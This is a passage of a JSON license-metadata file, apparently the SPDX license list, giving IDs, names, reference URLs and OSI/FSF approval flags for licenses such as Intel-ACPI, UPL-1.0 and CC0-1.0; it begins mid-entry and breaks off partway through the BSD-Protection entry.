24 "https://sourceware.org/git/?p\u003dbzip2.git;a\u003dblob;f\u003dLICENSE;hb\u003dbzip2-1.0.6",
25 "http://bzip.org/1.0.5/bzip2-manual-1.0.5.html"
26 ],
27 "isOsiApproved": false
28 },
29 {
30 "reference": "https://spdx.org/licenses/Intel-ACPI.html",
31 "isDeprecatedLicenseId": false,
32 "detailsUrl": "https://spdx.org/licenses/Intel-ACPI.json",
33 "referenceNumber": 2,
34 "name": "Intel ACPI Software License Agreement",
35 "licenseId": "Intel-ACPI",
36 "seeAlso": [
37 "https://fedoraproject.org/wiki/Licensing/Intel_ACPI_Software_License_Agreement"
38 ],
39 "isOsiApproved": false
40 },
41 {
42 "reference": "https://spdx.org/licenses/XSkat.html",
43 "isDeprecatedLicenseId": false,
44 "detailsUrl": "https://spdx.org/licenses/XSkat.json",
45 "referenceNumber": 3,
46 "name": "XSkat License",
47 "licenseId": "XSkat",
48 "seeAlso": [
49 "https://fedoraproject.org/wiki/Licensing/XSkat_License"
50 ],
51 "isOsiApproved": false
52 },
53 {
54 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.html",
55 "isDeprecatedLicenseId": false,
56 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0.json",
57 "referenceNumber": 4,
58 "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 Generic",
59 "licenseId": "CC-BY-NC-SA-2.0",
60 "seeAlso": [
61 "https://creativecommons.org/licenses/by-nc-sa/2.0/legalcode"
62 ],
63 "isOsiApproved": false
64 },
65 {
66 "reference": "https://spdx.org/licenses/Plexus.html",
67 "isDeprecatedLicenseId": false,
68 "detailsUrl": "https://spdx.org/licenses/Plexus.json",
69 "referenceNumber": 5,
70 "name": "Plexus Classworlds License",
71 "licenseId": "Plexus",
72 "seeAlso": [
73 "https://fedoraproject.org/wiki/Licensing/Plexus_Classworlds_License"
74 ],
75 "isOsiApproved": false
76 },
77 {
78 "reference": "https://spdx.org/licenses/Giftware.html",
79 "isDeprecatedLicenseId": false,
80 "detailsUrl": "https://spdx.org/licenses/Giftware.json",
81 "referenceNumber": 6,
82 "name": "Giftware License",
83 "licenseId": "Giftware",
84 "seeAlso": [
85 "http://liballeg.org/license.html#allegro-4-the-giftware-license"
86 ],
87 "isOsiApproved": false
88 },
89 {
90 "reference": "https://spdx.org/licenses/BitTorrent-1.0.html",
91 "isDeprecatedLicenseId": false,
92 "detailsUrl": "https://spdx.org/licenses/BitTorrent-1.0.json",
93 "referenceNumber": 7,
94 "name": "BitTorrent Open Source License v1.0",
95 "licenseId": "BitTorrent-1.0",
96 "seeAlso": [
97 "http://sources.gentoo.org/cgi-bin/viewvc.cgi/gentoo-x86/licenses/BitTorrent?r1\u003d1.1\u0026r2\u003d1.1.1.1\u0026diff_format\u003ds"
98 ],
99 "isOsiApproved": false
100 },
101 {
102 "reference": "https://spdx.org/licenses/APSL-1.1.html",
103 "isDeprecatedLicenseId": false,
104 "detailsUrl": "https://spdx.org/licenses/APSL-1.1.json",
105 "referenceNumber": 8,
106 "name": "Apple Public Source License 1.1",
107 "licenseId": "APSL-1.1",
108 "seeAlso": [
109 "http://www.opensource.apple.com/source/IOSerialFamily/IOSerialFamily-7/APPLE_LICENSE"
110 ],
111 "isOsiApproved": true
112 },
113 {
114 "reference": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.html",
115 "isDeprecatedLicenseId": true,
116 "detailsUrl": "https://spdx.org/licenses/GPL-2.0-with-GCC-exception.json",
117 "referenceNumber": 9,
118 "name": "GNU General Public License v2.0 w/GCC Runtime Library exception",
119 "licenseId": "GPL-2.0-with-GCC-exception",
120 "seeAlso": [
121 "https://gcc.gnu.org/git/?p\u003dgcc.git;a\u003dblob;f\u003dgcc/libgcc1.c;h\u003d762f5143fc6eed57b6797c82710f3538aa52b40b;hb\u003dcb143a3ce4fb417c68f5fa2691a1b1b1053dfba9#l10"
122 ],
123 "isOsiApproved": false
124 },
125 {
126 "reference": "https://spdx.org/licenses/UPL-1.0.html",
127 "isDeprecatedLicenseId": false,
128 "detailsUrl": "https://spdx.org/licenses/UPL-1.0.json",
129 "referenceNumber": 10,
130 "name": "Universal Permissive License v1.0",
131 "licenseId": "UPL-1.0",
132 "seeAlso": [
133 "https://opensource.org/licenses/UPL"
134 ],
135 "isOsiApproved": true,
136 "isFsfLibre": true
137 },
138 {
139 "reference": "https://spdx.org/licenses/wxWindows.html",
140 "isDeprecatedLicenseId": true,
141 "detailsUrl": "https://spdx.org/licenses/wxWindows.json",
142 "referenceNumber": 11,
143 "name": "wxWindows Library License",
144 "licenseId": "wxWindows",
145 "seeAlso": [
146 "https://opensource.org/licenses/WXwindows"
147 ],
148 "isOsiApproved": false
149 },
150 {
151 "reference": "https://spdx.org/licenses/Caldera.html",
152 "isDeprecatedLicenseId": false,
153 "detailsUrl": "https://spdx.org/licenses/Caldera.json",
154 "referenceNumber": 12,
155 "name": "Caldera License",
156 "licenseId": "Caldera",
157 "seeAlso": [
158 "http://www.lemis.com/grog/UNIX/ancient-source-all.pdf"
159 ],
160 "isOsiApproved": false
161 },
162 {
163 "reference": "https://spdx.org/licenses/Zend-2.0.html",
164 "isDeprecatedLicenseId": false,
165 "detailsUrl": "https://spdx.org/licenses/Zend-2.0.json",
166 "referenceNumber": 13,
167 "name": "Zend License v2.0",
168 "licenseId": "Zend-2.0",
169 "seeAlso": [
170 "https://web.archive.org/web/20130517195954/http://www.zend.com/license/2_00.txt"
171 ],
172 "isOsiApproved": false,
173 "isFsfLibre": true
174 },
175 {
176 "reference": "https://spdx.org/licenses/CUA-OPL-1.0.html",
177 "isDeprecatedLicenseId": false,
178 "detailsUrl": "https://spdx.org/licenses/CUA-OPL-1.0.json",
179 "referenceNumber": 14,
180 "name": "CUA Office Public License v1.0",
181 "licenseId": "CUA-OPL-1.0",
182 "seeAlso": [
183 "https://opensource.org/licenses/CUA-OPL-1.0"
184 ],
185 "isOsiApproved": true
186 },
187 {
188 "reference": "https://spdx.org/licenses/JPNIC.html",
189 "isDeprecatedLicenseId": false,
190 "detailsUrl": "https://spdx.org/licenses/JPNIC.json",
191 "referenceNumber": 15,
192 "name": "Japan Network Information Center License",
193 "licenseId": "JPNIC",
194 "seeAlso": [
195 "https://gitlab.isc.org/isc-projects/bind9/blob/master/COPYRIGHT#L366"
196 ],
197 "isOsiApproved": false
198 },
199 {
200 "reference": "https://spdx.org/licenses/SAX-PD.html",
201 "isDeprecatedLicenseId": false,
202 "detailsUrl": "https://spdx.org/licenses/SAX-PD.json",
203 "referenceNumber": 16,
204 "name": "Sax Public Domain Notice",
205 "licenseId": "SAX-PD",
206 "seeAlso": [
207 "http://www.saxproject.org/copying.html"
208 ],
209 "isOsiApproved": false
210 },
211 {
212 "reference": "https://spdx.org/licenses/CC-BY-ND-2.5.html",
213 "isDeprecatedLicenseId": false,
214 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-2.5.json",
215 "referenceNumber": 17,
216 "name": "Creative Commons Attribution No Derivatives 2.5 Generic",
217 "licenseId": "CC-BY-ND-2.5",
218 "seeAlso": [
219 "https://creativecommons.org/licenses/by-nd/2.5/legalcode"
220 ],
221 "isOsiApproved": false
222 },
223 {
224 "reference": "https://spdx.org/licenses/eGenix.html",
225 "isDeprecatedLicenseId": false,
226 "detailsUrl": "https://spdx.org/licenses/eGenix.json",
227 "referenceNumber": 18,
228 "name": "eGenix.com Public License 1.1.0",
229 "licenseId": "eGenix",
230 "seeAlso": [
231 "http://www.egenix.com/products/eGenix.com-Public-License-1.1.0.pdf",
232 "https://fedoraproject.org/wiki/Licensing/eGenix.com_Public_License_1.1.0"
233 ],
234 "isOsiApproved": false
235 },
236 {
237 "reference": "https://spdx.org/licenses/LGPLLR.html",
238 "isDeprecatedLicenseId": false,
239 "detailsUrl": "https://spdx.org/licenses/LGPLLR.json",
240 "referenceNumber": 19,
241 "name": "Lesser General Public License For Linguistic Resources",
242 "licenseId": "LGPLLR",
243 "seeAlso": [
244 "http://www-igm.univ-mlv.fr/~unitex/lgpllr.html"
245 ],
246 "isOsiApproved": false
247 },
248 {
249 "reference": "https://spdx.org/licenses/OLDAP-2.2.2.html",
250 "isDeprecatedLicenseId": false,
251 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.2.2.json",
252 "referenceNumber": 20,
253 "name": "Open LDAP Public License 2.2.2",
254 "licenseId": "OLDAP-2.2.2",
255 "seeAlso": [
256 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003ddf2cc1e21eb7c160695f5b7cffd6296c151ba188"
257 ],
258 "isOsiApproved": false
259 },
260 {
261 "reference": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.html",
262 "isDeprecatedLicenseId": false,
263 "detailsUrl": "https://spdx.org/licenses/CC-BY-ND-3.0-DE.json",
264 "referenceNumber": 21,
265 "name": "Creative Commons Attribution No Derivatives 3.0 Germany",
266 "licenseId": "CC-BY-ND-3.0-DE",
267 "seeAlso": [
268 "https://creativecommons.org/licenses/by-nd/3.0/de/legalcode"
269 ],
270 "isOsiApproved": false
271 },
272 {
273 "reference": "https://spdx.org/licenses/IPA.html",
274 "isDeprecatedLicenseId": false,
275 "detailsUrl": "https://spdx.org/licenses/IPA.json",
276 "referenceNumber": 22,
277 "name": "IPA Font License",
278 "licenseId": "IPA",
279 "seeAlso": [
280 "https://opensource.org/licenses/IPA"
281 ],
282 "isOsiApproved": true,
283 "isFsfLibre": true
284 },
285 {
286 "reference": "https://spdx.org/licenses/NCSA.html",
287 "isDeprecatedLicenseId": false,
288 "detailsUrl": "https://spdx.org/licenses/NCSA.json",
289 "referenceNumber": 23,
290 "name": "University of Illinois/NCSA Open Source License",
291 "licenseId": "NCSA",
292 "seeAlso": [
293 "http://otm.illinois.edu/uiuc_openSource",
294 "https://opensource.org/licenses/NCSA"
295 ],
296 "isOsiApproved": true,
297 "isFsfLibre": true
298 },
299 {
300 "reference": "https://spdx.org/licenses/W3C.html",
301 "isDeprecatedLicenseId": false,
302 "detailsUrl": "https://spdx.org/licenses/W3C.json",
303 "referenceNumber": 24,
304 "name": "W3C Software Notice and License (2002-12-31)",
305 "licenseId": "W3C",
306 "seeAlso": [
307 "http://www.w3.org/Consortium/Legal/2002/copyright-software-20021231.html",
308 "https://opensource.org/licenses/W3C"
309 ],
310 "isOsiApproved": true,
311 "isFsfLibre": true
312 },
313 {
314 "reference": "https://spdx.org/licenses/Adobe-2006.html",
315 "isDeprecatedLicenseId": false,
316 "detailsUrl": "https://spdx.org/licenses/Adobe-2006.json",
317 "referenceNumber": 25,
318 "name": "Adobe Systems Incorporated Source Code License Agreement",
319 "licenseId": "Adobe-2006",
320 "seeAlso": [
321 "https://fedoraproject.org/wiki/Licensing/AdobeLicense"
322 ],
323 "isOsiApproved": false
324 },
325 {
326 "reference": "https://spdx.org/licenses/Net-SNMP.html",
327 "isDeprecatedLicenseId": false,
328 "detailsUrl": "https://spdx.org/licenses/Net-SNMP.json",
329 "referenceNumber": 26,
330 "name": "Net-SNMP License",
331 "licenseId": "Net-SNMP",
332 "seeAlso": [
333 "http://net-snmp.sourceforge.net/about/license.html"
334 ],
335 "isOsiApproved": false
336 },
337 {
338 "reference": "https://spdx.org/licenses/CC-BY-SA-4.0.html",
339 "isDeprecatedLicenseId": false,
340 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-4.0.json",
341 "referenceNumber": 27,
342 "name": "Creative Commons Attribution Share Alike 4.0 International",
343 "licenseId": "CC-BY-SA-4.0",
344 "seeAlso": [
345 "https://creativecommons.org/licenses/by-sa/4.0/legalcode"
346 ],
347 "isOsiApproved": false,
348 "isFsfLibre": true
349 },
350 {
351 "reference": "https://spdx.org/licenses/YPL-1.0.html",
352 "isDeprecatedLicenseId": false,
353 "detailsUrl": "https://spdx.org/licenses/YPL-1.0.json",
354 "referenceNumber": 28,
355 "name": "Yahoo! Public License v1.0",
356 "licenseId": "YPL-1.0",
357 "seeAlso": [
358 "http://www.zimbra.com/license/yahoo_public_license_1.0.html"
359 ],
360 "isOsiApproved": false
361 },
362 {
363 "reference": "https://spdx.org/licenses/Nunit.html",
364 "isDeprecatedLicenseId": true,
365 "detailsUrl": "https://spdx.org/licenses/Nunit.json",
366 "referenceNumber": 29,
367 "name": "Nunit License",
368 "licenseId": "Nunit",
369 "seeAlso": [
370 "https://fedoraproject.org/wiki/Licensing/Nunit"
371 ],
372 "isOsiApproved": false
373 },
374 {
375 "reference": "https://spdx.org/licenses/MITNFA.html",
376 "isDeprecatedLicenseId": false,
377 "detailsUrl": "https://spdx.org/licenses/MITNFA.json",
378 "referenceNumber": 30,
379 "name": "MIT +no-false-attribs license",
380 "licenseId": "MITNFA",
381 "seeAlso": [
382 "https://fedoraproject.org/wiki/Licensing/MITNFA"
383 ],
384 "isOsiApproved": false
385 },
386 {
387 "reference": "https://spdx.org/licenses/PHP-3.01.html",
388 "isDeprecatedLicenseId": false,
389 "detailsUrl": "https://spdx.org/licenses/PHP-3.01.json",
390 "referenceNumber": 31,
391 "name": "PHP License v3.01",
392 "licenseId": "PHP-3.01",
393 "seeAlso": [
394 "http://www.php.net/license/3_01.txt"
395 ],
396 "isOsiApproved": true,
397 "isFsfLibre": true
398 },
399 {
400 "reference": "https://spdx.org/licenses/BSD-Source-Code.html",
401 "isDeprecatedLicenseId": false,
402 "detailsUrl": "https://spdx.org/licenses/BSD-Source-Code.json",
403 "referenceNumber": 32,
404 "name": "BSD Source Code Attribution",
405 "licenseId": "BSD-Source-Code",
406 "seeAlso": [
407 "https://github.com/robbiehanson/CocoaHTTPServer/blob/master/LICENSE.txt"
408 ],
409 "isOsiApproved": false
410 },
411 {
412 "reference": "https://spdx.org/licenses/CC-BY-SA-2.5.html",
413 "isDeprecatedLicenseId": false,
414 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.5.json",
415 "referenceNumber": 33,
416 "name": "Creative Commons Attribution Share Alike 2.5 Generic",
417 "licenseId": "CC-BY-SA-2.5",
418 "seeAlso": [
419 "https://creativecommons.org/licenses/by-sa/2.5/legalcode"
420 ],
421 "isOsiApproved": false
422 },
423 {
424 "reference": "https://spdx.org/licenses/Motosoto.html",
425 "isDeprecatedLicenseId": false,
426 "detailsUrl": "https://spdx.org/licenses/Motosoto.json",
427 "referenceNumber": 34,
428 "name": "Motosoto License",
429 "licenseId": "Motosoto",
430 "seeAlso": [
431 "https://opensource.org/licenses/Motosoto"
432 ],
433 "isOsiApproved": true
434 },
435 {
436 "reference": "https://spdx.org/licenses/OSL-1.1.html",
437 "isDeprecatedLicenseId": false,
438 "detailsUrl": "https://spdx.org/licenses/OSL-1.1.json",
439 "referenceNumber": 35,
440 "name": "Open Software License 1.1",
441 "licenseId": "OSL-1.1",
442 "seeAlso": [
443 "https://fedoraproject.org/wiki/Licensing/OSL1.1"
444 ],
445 "isOsiApproved": false,
446 "isFsfLibre": true
447 },
448 {
449 "reference": "https://spdx.org/licenses/NGPL.html",
450 "isDeprecatedLicenseId": false,
451 "detailsUrl": "https://spdx.org/licenses/NGPL.json",
452 "referenceNumber": 36,
453 "name": "Nethack General Public License",
454 "licenseId": "NGPL",
455 "seeAlso": [
456 "https://opensource.org/licenses/NGPL"
457 ],
458 "isOsiApproved": true
459 },
460 {
461 "reference": "https://spdx.org/licenses/CC-BY-2.5-AU.html",
462 "isDeprecatedLicenseId": false,
463 "detailsUrl": "https://spdx.org/licenses/CC-BY-2.5-AU.json",
464 "referenceNumber": 37,
465 "name": "Creative Commons Attribution 2.5 Australia",
466 "licenseId": "CC-BY-2.5-AU",
467 "seeAlso": [
468 "https://creativecommons.org/licenses/by/2.5/au/legalcode"
469 ],
470 "isOsiApproved": false
471 },
472 {
473 "reference": "https://spdx.org/licenses/Unicode-TOU.html",
474 "isDeprecatedLicenseId": false,
475 "detailsUrl": "https://spdx.org/licenses/Unicode-TOU.json",
476 "referenceNumber": 38,
477 "name": "Unicode Terms of Use",
478 "licenseId": "Unicode-TOU",
479 "seeAlso": [
480 "http://www.unicode.org/copyright.html"
481 ],
482 "isOsiApproved": false
483 },
484 {
485 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.html",
486 "isDeprecatedLicenseId": false,
487 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-License.json",
488 "referenceNumber": 39,
489 "name": "BSD 3-Clause No Nuclear License",
490 "licenseId": "BSD-3-Clause-No-Nuclear-License",
491 "seeAlso": [
492 "http://download.oracle.com/otn-pub/java/licenses/bsd.txt?AuthParam\u003d1467140197_43d516ce1776bd08a58235a7785be1cc"
493 ],
494 "isOsiApproved": false
495 },
496 {
497 "reference": "https://spdx.org/licenses/OPUBL-1.0.html",
498 "isDeprecatedLicenseId": false,
499 "detailsUrl": "https://spdx.org/licenses/OPUBL-1.0.json",
500 "referenceNumber": 40,
501 "name": "Open Publication License v1.0",
502 "licenseId": "OPUBL-1.0",
503 "seeAlso": [
504 "http://opencontent.org/openpub/",
505 "https://www.debian.org/opl",
506 "https://www.ctan.org/license/opl"
507 ],
508 "isOsiApproved": false
509 },
510 {
511 "reference": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.html",
512 "isDeprecatedLicenseId": false,
513 "detailsUrl": "https://spdx.org/licenses/CC-BY-NC-SA-2.0-UK.json",
514 "referenceNumber": 41,
515 "name": "Creative Commons Attribution Non Commercial Share Alike 2.0 England and Wales",
516 "licenseId": "CC-BY-NC-SA-2.0-UK",
517 "seeAlso": [
518 "https://creativecommons.org/licenses/by-nc-sa/2.0/uk/legalcode"
519 ],
520 "isOsiApproved": false
521 },
522 {
523 "reference": "https://spdx.org/licenses/NLOD-2.0.html",
524 "isDeprecatedLicenseId": false,
525 "detailsUrl": "https://spdx.org/licenses/NLOD-2.0.json",
526 "referenceNumber": 42,
527 "name": "Norwegian Licence for Open Government Data (NLOD) 2.0",
528 "licenseId": "NLOD-2.0",
529 "seeAlso": [
530 "http://data.norge.no/nlod/en/2.0"
531 ],
532 "isOsiApproved": false
533 },
534 {
535 "reference": "https://spdx.org/licenses/gnuplot.html",
536 "isDeprecatedLicenseId": false,
537 "detailsUrl": "https://spdx.org/licenses/gnuplot.json",
538 "referenceNumber": 43,
539 "name": "gnuplot License",
540 "licenseId": "gnuplot",
541 "seeAlso": [
542 "https://fedoraproject.org/wiki/Licensing/Gnuplot"
543 ],
544 "isOsiApproved": false,
545 "isFsfLibre": true
546 },
547 {
548 "reference": "https://spdx.org/licenses/EPICS.html",
549 "isDeprecatedLicenseId": false,
550 "detailsUrl": "https://spdx.org/licenses/EPICS.json",
551 "referenceNumber": 44,
552 "name": "EPICS Open License",
553 "licenseId": "EPICS",
554 "seeAlso": [
555 "https://epics.anl.gov/license/open.php"
556 ],
557 "isOsiApproved": false
558 },
559 {
560 "reference": "https://spdx.org/licenses/Info-ZIP.html",
561 "isDeprecatedLicenseId": false,
562 "detailsUrl": "https://spdx.org/licenses/Info-ZIP.json",
563 "referenceNumber": 45,
564 "name": "Info-ZIP License",
565 "licenseId": "Info-ZIP",
566 "seeAlso": [
567 "http://www.info-zip.org/license.html"
568 ],
569 "isOsiApproved": false
570 },
571 {
572 "reference": "https://spdx.org/licenses/OLDAP-2.0.html",
573 "isDeprecatedLicenseId": false,
574 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.0.json",
575 "referenceNumber": 46,
576 "name": "Open LDAP Public License v2.0 (or possibly 2.0A and 2.0B)",
577 "licenseId": "OLDAP-2.0",
578 "seeAlso": [
579 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003dcbf50f4e1185a21abd4c0a54d3f4341fe28f36ea"
580 ],
581 "isOsiApproved": false
582 },
583 {
584 "reference": "https://spdx.org/licenses/CERN-OHL-P-2.0.html",
585 "isDeprecatedLicenseId": false,
586 "detailsUrl": "https://spdx.org/licenses/CERN-OHL-P-2.0.json",
587 "referenceNumber": 47,
588 "name": "CERN Open Hardware Licence Version 2 - Permissive",
589 "licenseId": "CERN-OHL-P-2.0",
590 "seeAlso": [
591 "https://www.ohwr.org/project/cernohl/wikis/Documents/CERN-OHL-version-2"
592 ],
593 "isOsiApproved": true
594 },
595 {
596 "reference": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.html",
597 "isDeprecatedLicenseId": false,
598 "detailsUrl": "https://spdx.org/licenses/BSD-3-Clause-No-Nuclear-Warranty.json",
599 "referenceNumber": 48,
600 "name": "BSD 3-Clause No Nuclear Warranty",
601 "licenseId": "BSD-3-Clause-No-Nuclear-Warranty",
602 "seeAlso": [
603 "https://jogamp.org/git/?p\u003dgluegen.git;a\u003dblob_plain;f\u003dLICENSE.txt"
604 ],
605 "isOsiApproved": false
606 },
607 {
608 "reference": "https://spdx.org/licenses/AML.html",
609 "isDeprecatedLicenseId": false,
610 "detailsUrl": "https://spdx.org/licenses/AML.json",
611 "referenceNumber": 49,
612 "name": "Apple MIT License",
613 "licenseId": "AML",
614 "seeAlso": [
615 "https://fedoraproject.org/wiki/Licensing/Apple_MIT_License"
616 ],
617 "isOsiApproved": false
618 },
619 {
620 "reference": "https://spdx.org/licenses/MulanPSL-1.0.html",
621 "isDeprecatedLicenseId": false,
622 "detailsUrl": "https://spdx.org/licenses/MulanPSL-1.0.json",
623 "referenceNumber": 50,
624 "name": "Mulan Permissive Software License, Version 1",
625 "licenseId": "MulanPSL-1.0",
626 "seeAlso": [
627 "https://license.coscl.org.cn/MulanPSL/",
628 "https://github.com/yuwenlong/longphp/blob/25dfb70cc2a466dc4bb55ba30901cbce08d164b5/LICENSE"
629 ],
630 "isOsiApproved": false
631 },
632 {
633 "reference": "https://spdx.org/licenses/Multics.html",
634 "isDeprecatedLicenseId": false,
635 "detailsUrl": "https://spdx.org/licenses/Multics.json",
636 "referenceNumber": 51,
637 "name": "Multics License",
638 "licenseId": "Multics",
639 "seeAlso": [
640 "https://opensource.org/licenses/Multics"
641 ],
642 "isOsiApproved": true
643 },
644 {
645 "reference": "https://spdx.org/licenses/VSL-1.0.html",
646 "isDeprecatedLicenseId": false,
647 "detailsUrl": "https://spdx.org/licenses/VSL-1.0.json",
648 "referenceNumber": 52,
649 "name": "Vovida Software License v1.0",
650 "licenseId": "VSL-1.0",
651 "seeAlso": [
652 "https://opensource.org/licenses/VSL-1.0"
653 ],
654 "isOsiApproved": true
655 },
656 {
657 "reference": "https://spdx.org/licenses/RSA-MD.html",
658 "isDeprecatedLicenseId": false,
659 "detailsUrl": "https://spdx.org/licenses/RSA-MD.json",
660 "referenceNumber": 53,
661 "name": "RSA Message-Digest License",
662 "licenseId": "RSA-MD",
663 "seeAlso": [
664 "http://www.faqs.org/rfcs/rfc1321.html"
665 ],
666 "isOsiApproved": false
667 },
668 {
669 "reference": "https://spdx.org/licenses/CC-PDDC.html",
670 "isDeprecatedLicenseId": false,
671 "detailsUrl": "https://spdx.org/licenses/CC-PDDC.json",
672 "referenceNumber": 54,
673 "name": "Creative Commons Public Domain Dedication and Certification",
674 "licenseId": "CC-PDDC",
675 "seeAlso": [
676 "https://creativecommons.org/licenses/publicdomain/"
677 ],
678 "isOsiApproved": false
679 },
680 {
681 "reference": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.html",
682 "isDeprecatedLicenseId": false,
683 "detailsUrl": "https://spdx.org/licenses/CC-BY-SA-2.1-JP.json",
684 "referenceNumber": 55,
685 "name": "Creative Commons Attribution Share Alike 2.1 Japan",
686 "licenseId": "CC-BY-SA-2.1-JP",
687 "seeAlso": [
688 "https://creativecommons.org/licenses/by-sa/2.1/jp/legalcode"
689 ],
690 "isOsiApproved": false
691 },
692 {
693 "reference": "https://spdx.org/licenses/LPPL-1.2.html",
694 "isDeprecatedLicenseId": false,
695 "detailsUrl": "https://spdx.org/licenses/LPPL-1.2.json",
696 "referenceNumber": 56,
697 "name": "LaTeX Project Public License v1.2",
698 "licenseId": "LPPL-1.2",
699 "seeAlso": [
700 "http://www.latex-project.org/lppl/lppl-1-2.txt"
701 ],
702 "isOsiApproved": false,
703 "isFsfLibre": true
704 },
705 {
706 "reference": "https://spdx.org/licenses/Spencer-94.html",
707 "isDeprecatedLicenseId": false,
708 "detailsUrl": "https://spdx.org/licenses/Spencer-94.json",
709 "referenceNumber": 57,
710 "name": "Spencer License 94",
711 "licenseId": "Spencer-94",
712 "seeAlso": [
713 "https://fedoraproject.org/wiki/Licensing/Henry_Spencer_Reg-Ex_Library_License"
714 ],
715 "isOsiApproved": false
716 },
717 {
718 "reference": "https://spdx.org/licenses/OLDAP-1.2.html",
719 "isDeprecatedLicenseId": false,
720 "detailsUrl": "https://spdx.org/licenses/OLDAP-1.2.json",
721 "referenceNumber": 58,
722 "name": "Open LDAP Public License v1.2",
723 "licenseId": "OLDAP-1.2",
724 "seeAlso": [
725 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d42b0383c50c299977b5893ee695cf4e486fb0dc7"
726 ],
727 "isOsiApproved": false
728 },
729 {
730 "reference": "https://spdx.org/licenses/O-UDA-1.0.html",
731 "isDeprecatedLicenseId": false,
732 "detailsUrl": "https://spdx.org/licenses/O-UDA-1.0.json",
733 "referenceNumber": 59,
734 "name": "Open Use of Data Agreement v1.0",
735 "licenseId": "O-UDA-1.0",
736 "seeAlso": [
737 "https://github.com/microsoft/Open-Use-of-Data-Agreement/blob/v1.0/O-UDA-1.0.md",
738 "https://cdla.dev/open-use-of-data-agreement-v1-0/"
739 ],
740 "isOsiApproved": false
741 },
742 {
743 "reference": "https://spdx.org/licenses/OLDAP-2.7.html",
744 "isDeprecatedLicenseId": false,
745 "detailsUrl": "https://spdx.org/licenses/OLDAP-2.7.json",
746 "referenceNumber": 60,
747 "name": "Open LDAP Public License v2.7",
748 "licenseId": "OLDAP-2.7",
749 "seeAlso": [
750 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d47c2415c1df81556eeb39be6cad458ef87c534a2"
751 ],
752 "isOsiApproved": false,
753 "isFsfLibre": true
754 },
755 {
756 "reference": "https://spdx.org/licenses/Glulxe.html",
757 "isDeprecatedLicenseId": false,
758 "detailsUrl": "https://spdx.org/licenses/Glulxe.json",
759 "referenceNumber": 61,
760 "name": "Glulxe License",
761 "licenseId": "Glulxe",
762 "seeAlso": [
763 "https://fedoraproject.org/wiki/Licensing/Glulxe"
764 ],
765 "isOsiApproved": false
766 },
767 {
768 "reference": "https://spdx.org/licenses/iMatix.html",
769 "isDeprecatedLicenseId": false,
770 "detailsUrl": "https://spdx.org/licenses/iMatix.json",
771 "referenceNumber": 62,
772 "name": "iMatix Standard Function Library Agreement",
773 "licenseId": "iMatix",
774 "seeAlso": [
775 "http://legacy.imatix.com/html/sfl/sfl4.htm#license"
776 ],
777 "isOsiApproved": false,
778 "isFsfLibre": true
779 },
780 {
781 "reference": "https://spdx.org/licenses/TAPR-OHL-1.0.html",
782 "isDeprecatedLicenseId": false,
783 "detailsUrl": "https://spdx.org/licenses/TAPR-OHL-1.0.json",
784 "referenceNumber": 63,
785 "name": "TAPR Open Hardware License v1.0",
786 "licenseId": "TAPR-OHL-1.0",
787 "seeAlso": [
788 "https://www.tapr.org/OHL"
789 ],
790 "isOsiApproved": false
791 },
792 {
793 "reference": "https://spdx.org/licenses/NBPL-1.0.html",
794 "isDeprecatedLicenseId": false,
795 "detailsUrl": "https://spdx.org/licenses/NBPL-1.0.json",
796 "referenceNumber": 64,
797 "name": "Net Boolean Public License v1",
798 "licenseId": "NBPL-1.0",
799 "seeAlso": [
800 "http://www.openldap.org/devel/gitweb.cgi?p\u003dopenldap.git;a\u003dblob;f\u003dLICENSE;hb\u003d37b4b3f6cc4bf34e1d3dec61e69914b9819d8894"
801 ],
802 "isOsiApproved": false
803 },
804 {
805 "reference": "https://spdx.org/licenses/LiLiQ-R-1.1.html",
806 "isDeprecatedLicenseId": false,
807 "detailsUrl": "https://spdx.org/licenses/LiLiQ-R-1.1.json",
808 "referenceNumber": 65,
809 "name": "Licence Libre du Québec – Réciprocité version 1.1",
810 "licenseId": "LiLiQ-R-1.1",
811 "seeAlso": [
812 "https://www.forge.gouv.qc.ca/participez/licence-logicielle/licence-libre-du-quebec-liliq-en-francais/licence-libre-du-quebec-reciprocite-liliq-r-v1-1/",
813 "http://opensource.org/licenses/LiLiQ-R-1.1"
814 ],
815 "isOsiApproved": true
816 },
817 {
818 "reference": "https://spdx.org/licenses/Noweb.html",
819 "isDeprecatedLicenseId": false,
820 "detailsUrl": "https://spdx.org/licenses/Noweb.json",
821 "referenceNumber": 66,
822 "name": "Noweb License",
823 "licenseId": "Noweb",
824 "seeAlso": [
825 "https://fedoraproject.org/wiki/Licensing/Noweb"
826 ],
827 "isOsiApproved": false
828 },
829 {
830 "reference": "https://spdx.org/licenses/CC0-1.0.html",
831 "isDeprecatedLicenseId": false,
832 "detailsUrl": "https://spdx.org/licenses/CC0-1.0.json",
833 "referenceNumber": 67,
834 "name": "Creative Commons Zero v1.0 Universal",
835 "licenseId": "CC0-1.0",
836 "seeAlso": [
837 "https://creativecommons.org/publicdomain/zero/1.0/legalcode"
838 ],
839 "isOsiApproved": false,
840 "isFsfLibre": true
841 },
842 {
843 "reference": "https://spdx.org/licenses/BSD-Protection.html",
844 "isDeprecatedLicenseId": false,
845 "detailsUrl": "https://spdx.org/licenses/BSD-Protection.json",
846 "referenceNumber": 68,
847 "name": "BSD Protection License",
848 "licenseId": "BSD-Protection",
849 "seeAlso": [
850 "https://fedoraproject.org/wiki/Licensing/BSD_Protection_License"
851 ],
